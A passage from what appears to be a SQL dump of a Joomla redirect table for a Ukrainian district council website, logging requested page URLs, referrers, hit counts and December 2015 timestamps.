00:00:00',301),(21781,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=ru','','','',4,0,'2015-12-13 07:32:15','0000-00-00 00:00:00',301),(21782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','https://www.google.com.ua','',3,0,'2015-12-13 11:41:25','0000-00-00 00:00:00',301),(21783,'http://www.malyn-rayrada.org.ua/index.php/1159-pro-sklikannya-41sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-13 14:02:35','0000-00-00 00:00:00',301),(21784,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1062-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-lukivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 15:31:18','0000-00-00 00:00:00',301),(21785,'http://www.malyn-rayrada.org.ua/index.php/265-nadhodzhennja-dohodiv-do-bjudzhetu-zhitomirskoi','','','',11,0,'2015-12-13 15:32:01','0000-00-00 00:00:00',301),(21786,'http://www.malyn-rayrada.org.ua/index.php/469-sogodni-22-sichnja-v-ukraini-vidznachaetsja-den','','','',12,0,'2015-12-13 15:32:37','0000-00-00 00:00:00',301),(21787,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/374-pro-vtratu-chinnosti-rishennja-rajonnoi-radi-5','','','',9,0,'2015-12-13 15:35:14','0000-00-00 00:00:00',301),(21788,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/535-pro-hid-vikonannja-programi-reformuvannja-i','','','',16,0,'2015-12-13 15:36:06','0000-00-00 00:00:00',301),(21789,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/555-pro-vikonannja-rajonnogo-bjudzhetu-za-pershe','','','',21,0,'2015-12-13 15:36:20','0000-00-00 00:00:00',301),(21790,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/354-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_13?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-13 15:37:47','0000-00-00 00:00:00',301),(21791,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/600-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi_2','','','',19,0,'2015-12-13 15:37:55','0000-00-00 00:00:00',301),(21792,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/602-pro-hid-vikonannja-rajonnoi-socialnoi-programi_2','','','',13,0,'2015-12-13 15:37:59','0000-00-00 00:00:00',301),(21793,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/615-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_12','','','',11,0,'2015-12-13 15:38:07','0000-00-00 00:00:00',301),(21794,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/689-pro-zatverdzhennja-pereliku-zakladiv-kulturi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 15:38:28','0000-00-00 00:00:00',301),(21795,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/306-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 15:38:37','0000-00-00 00:00:00',301),(21796,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/307-pro-pogodzhennja-otrimannja-specialnogo-dozvolu-na?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 15:38:40','0000-00-00 00:00:00',301),(21797,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/669-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-13 15:39:14','0000-00-00 00:00:00',301),(21798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=ru','','','',6,0,'2015-12-13 15:54:57','0000-00-00 00:00:00',301),(21799,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/171-pro-programu-socialno-ekonomichnogo-rozvitku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 16:17:57','0000-00-00 00:00:00',301),(21800,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/72-pro-rajonnij-bjudzhet-na-2011-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 16:17:59','0000-00-00 00:00:00',301),(21801,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/84-rishennja-prijnjati-na-3-sesii-rajonnoi-radi-6?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 16:18:00','0000-00-00 00:00:00',301),(21802,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/6-pro-zatverdzhennja-porjadku-i-normativiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-13 16:18:46','0000-00-00 00:00:00',301),(21803,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/128-pro-zatverdzhennja-rozmiru-vartosti-produktiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-13 16:18:59','0000-00-00 00:00:00',301),(21804,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna','','','',25,0,'2015-12-13 16:19:31','0000-00-00 00:00:00',301),(21805,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-13 16:19:38','0000-00-00 00:00:00',301),(21806,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-12-13 16:19:40','0000-00-00 00:00:00',301),(21807,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/996-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-13 16:19:43','0000-00-00 00:00:00',301),(21808,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/998-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu?tmpl=component&print=1&layout=default&page=','','','',12,0,'2015-12-13 16:19:45','0000-00-00 00:00:00',301),(21809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/999-pro-rajonnij-byudzhet-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-13 16:19:47','0000-00-00 00:00:00',301),(21810,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-13 16:20:05','0000-00-00 00:00:00',301),(21811,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/911-pro-zatverdzhennya-novogo-skladu-komisiji-rajonnoji-radi-z-pitan-ponovlennya-prav-reabilitovanikh','','','',67,0,'2015-12-13 16:20:12','0000-00-00 00:00:00',301),(21812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=86:2010-08-09-09-12-32&catid=11&Itemid=16&lang=uk','','','',18,0,'2015-12-13 17:43:03','0000-00-00 00:00:00',301),(21813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11&lang=uk&Itemid=','','','',2,0,'2015-12-14 03:17:58','0000-00-00 00:00:00',301),(21814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=ru','','','',11,0,'2015-12-14 06:25:36','0000-00-00 00:00:00',301),(21815,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=en','','','',7,0,'2015-12-14 07:03:54','0000-00-00 00:00:00',301),(21816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-12-14 09:10:41','0000-00-00 00:00:00',301),(21817,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2015-12-14 12:20:56','0000-00-00 00:00:00',301),(21818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=en&sa=U&ved=0ahUKEwimzLO-ntvJAhWDPCYKHRjmCE04yAEQFgibAzBV&usg=AFQjCNGqmyHIFV6E0CR9c6wRNJTT3eUhUw//images/stories/crim','','','',1,0,'2015-12-14 14:05:55','0000-00-00 00:00:00',301),(21819,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad','','','',6,0,'2015-12-14 14:24:14','0000-00-00 00:00:00',301),(21820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=ru','','','',5,0,'2015-12-14 15:08:05','0000-00-00 00:00:00',301),(21821,'http://www.malyn-rayrada.org.ua/[URL=http:/s546.photobucket.com/user/redwingfan_bradee/media/AWESOMESANTA.gif.html][IMG]http:/i546.photobucket.com/albums/hh418/redwingfan_bradee/AWESOMESANTA.gif[/IMG][/URL]','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',2,0,'2015-12-14 19:04:43','0000-00-00 00:00:00',301),(21822,'http://www.malyn-rayrada.org.ua/Путь до изображения №1','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',2,0,'2015-12-14 19:28:32','0000-00-00 00:00:00',301),(21823,'http://www.malyn-rayrada.org.ua/Путь до изображения №2','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',1,0,'2015-12-14 19:28:33','0000-00-00 00:00:00',301),(21824,'http://www.malyn-rayrada.org.ua/Путь до изображения №3','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',1,0,'2015-12-14 19:28:33','0000-00-00 00:00:00',301),(21825,'http://www.malyn-rayrada.org.ua/Путь до изображения №4','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',1,0,'2015-12-14 19:28:33','0000-00-00 00:00:00',301),(21826,'http://www.malyn-rayrada.org.ua/Путь до изображения №5','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-39','',1,0,'2015-12-14 19:28:33','0000-00-00 00:00:00',301),(21827,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 03:30:35','0000-00-00 00:00:00',301),(21828,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=273:-2011-&Itemid=62&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 03:30:58','0000-00-00 00:00:00',301),(21830,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=550:2012-01-26-12-39-51&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-15 03:31:08','0000-00-00 00:00:00',301),(21831,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=862:-qq&Itemid=18&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 03:31:17','0000-00-00 00:00:00',301),(21832,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=191:2010-12-15-13-27-06&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 03:31:26','0000-00-00 00:00:00',301),(21833,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 03:31:29','0000-00-00 00:00:00',301),(21834,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 04:19:51','0000-00-00 00:00:00',301),(21835,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1043:-------2013-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 04:20:34','0000-00-00 00:00:00',301),(21836,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=449:2011-10-28-08-04-47&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 04:20:38','0000-00-00 00:00:00',301),(21837,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=510:-2011-&Itemid=73&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 04:20:42','0000-00-00 00:00:00',301),(21838,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 04:20:51','0000-00-00 00:00:00',301),(21839,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=828:-q-q&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 04:43:02','0000-00-00 00:00:00',301),(21840,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=562:-19122011194-30122011202&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 04:43:10','0000-00-00 00:00:00',301),(21841,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=677:------------2012-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 04:43:17','0000-00-00 00:00:00',301),(21842,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=820:2012-11-14-16-42-11&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 04:44:00','0000-00-00 00:00:00',301),(21843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=721:-lr&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-12-15 04:51:47','0000-00-00 00:00:00',301),(21844,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 04:54:40','0000-00-00 00:00:00',301),(21845,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:09:54','0000-00-00 00:00:00',301),(21846,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=711:2012-06-14-15-09-26&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 05:16:34','0000-00-00 00:00:00',301),(21847,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1204:2014-01-31-07-51-23&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:16:47','0000-00-00 00:00:00',301),(21848,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=711:2012-06-14-15-09-26&Itemid=82&lang=en&option=com_content&view=article','','','',4,0,'2015-12-15 05:16:51','0000-00-00 00:00:00',301),(21849,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:16:56','0000-00-00 00:00:00',301),(21850,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:17:05','0000-00-00 00:00:00',301),(21851,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1335:2014-06-07-10-58-30&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:23:41','0000-00-00 00:00:00',301),(21852,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=846:2012-12-10-14-06-00&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 05:23:49','0000-00-00 00:00:00',301),(21853,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=561:2012-02-02-08-58-39&Itemid=76&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:23:57','0000-00-00 00:00:00',301),(21854,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=872:2012-12-17-18-45-20&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:24:30','0000-00-00 00:00:00',301),(21855,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:24:34','0000-00-00 00:00:00',301),(21856,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=818:2012-11-14-16-37-52&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 05:24:38','0000-00-00 00:00:00',301),(21857,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1078:-2007-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:24:51','0000-00-00 00:00:00',301),(21858,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1092:2013-09-19-12-18-37&Itemid=94&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 05:24:59','0000-00-00 00:00:00',301),(21859,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1138:------15112013&Itemid=18&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 05:25:03','0000-00-00 00:00:00',301),(21860,'http://www.malyn-rayrada.org.ua/index.php?id=53&Itemid=94&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-15 05:32:52','0000-00-00 00:00:00',301),(21861,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 05:41:13','0000-00-00 00:00:00',301),(21862,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1211:-2014-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:15','0000-00-00 00:00:00',301),(21863,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=579:-2011-2015-&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-15 05:41:22','0000-00-00 00:00:00',301),(21864,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1298:2014-04-24-11-02-55&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 05:41:24','0000-00-00 00:00:00',301),(21865,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=523:2011-12-30-10-16-28&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:26','0000-00-00 00:00:00',301),(21866,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=342:----6----6--15--2011-&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:30','0000-00-00 00:00:00',301),(21867,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=346:2011-06-15-12-31-02&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:32','0000-00-00 00:00:00',301),(21868,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=760:-qq-24-2012-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:35','0000-00-00 00:00:00',301),(21869,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-15 05:41:37','0000-00-00 00:00:00',301),(21870,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1152:2013-11-28-14-58-05&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:41','0000-00-00 00:00:00',301),(21871,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=708:---l---r&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:41:50','0000-00-00 00:00:00',301),(21872,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1199:---------------l-r---&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 05:41:58','0000-00-00 00:00:00',301),(21873,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=561:2012-02-02-08-58-39&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:50:40','0000-00-00 00:00:00',301),(21874,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1099:------------------l-r&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 05:50:43','0000-00-00 00:00:00',301),(21875,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 05:50:47','0000-00-00 00:00:00',301),(21876,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=505:2011-12-16-13-24-32&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:50:51','0000-00-00 00:00:00',301),(21877,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 05:50:53','0000-00-00 00:00:00',301),(21878,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 05:55:11','0000-00-00 00:00:00',301),(21879,'http://www.malyn-rayrada.org.ua/index.php?id=40:--28032012-&Itemid=77&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2015-12-15 05:55:20','0000-00-00 00:00:00',301),(21880,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-15 05:55:22','0000-00-00 00:00:00',301),(21881,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=797:-6-16112010-5-&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 05:55:26','0000-00-00 00:00:00',301),(21882,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1153:-2013-&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 06:17:33','0000-00-00 00:00:00',301),(21883,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 06:17:42','0000-00-00 00:00:00',301),(21884,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1191:------2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 06:28:06','0000-00-00 00:00:00',301),(21885,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=552:2012-01-26-12-47-12&Itemid=76&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 06:28:08','0000-00-00 00:00:00',301),(21886,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 06:28:10','0000-00-00 00:00:00',301),(21887,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=634:-2016-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 06:28:15','0000-00-00 00:00:00',301),(21888,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=346:2011-06-15-12-31-02&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 06:28:30','0000-00-00 00:00:00',301),(21889,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1157:-11-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-15 06:28:34','0000-00-00 00:00:00',301),(21890,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 06:41:31','0000-00-00 00:00:00',301),(21891,'http://www.malyn-rayrada.org.ua/index.php?catid=7&id=9:2010-06-05-15-10-04&Itemid=12&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 06:41:35','0000-00-00 00:00:00',301),(21892,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=344:2011-06-15-12-25-27&Itemid=68&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 06:41:39','0000-00-00 00:00:00',301),(21893,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=540:-2010-2015-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 06:41:48','0000-00-00 00:00:00',301),(21894,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=787:2012-10-15-09-13-25&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 06:47:13','0000-00-00 00:00:00',301),(21895,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 06:47:15','0000-00-00 00:00:00',301),(21896,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 06:47:17','0000-00-00 00:00:00',301),(21897,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=777:2012-10-02-10-06-36&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 06:47:21','0000-00-00 00:00:00',301),(21898,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=188:2010-12-15-13-18-12&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 06:53:33','0000-00-00 00:00:00',301),(21899,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=922:2013-02-11-10-53-17&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 06:54:37','0000-00-00 00:00:00',301),(21900,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:02:48','0000-00-00 00:00:00',301),(21901,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1022:-lr-&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:16:13','0000-00-00 00:00:00',301),(21902,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:21:49','0000-00-00 00:00:00',301),(21903,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1039:-l-r&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:21:54','0000-00-00 00:00:00',301),(21904,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:22:02','0000-00-00 00:00:00',301),(21905,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=846:2012-12-10-14-06-00&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:22:08','0000-00-00 00:00:00',301),(21906,'http://www.malyn-rayrada.org.ua/index.php?catid=4:2010-06-05-12-51-18&id=4:-1062010&Itemid=8&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:22:16','0000-00-00 00:00:00',301),(21907,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1194:-------------2012-2015--&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:24:30','0000-00-00 00:00:00',301),(21908,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1163:2013-12-20-07-44-35&Itemid=18&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:24:46','0000-00-00 00:00:00',301),(21909,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:24:58','0000-00-00 00:00:00',301),(21910,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1204:2014-01-31-07-51-23&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 07:25:08','0000-00-00 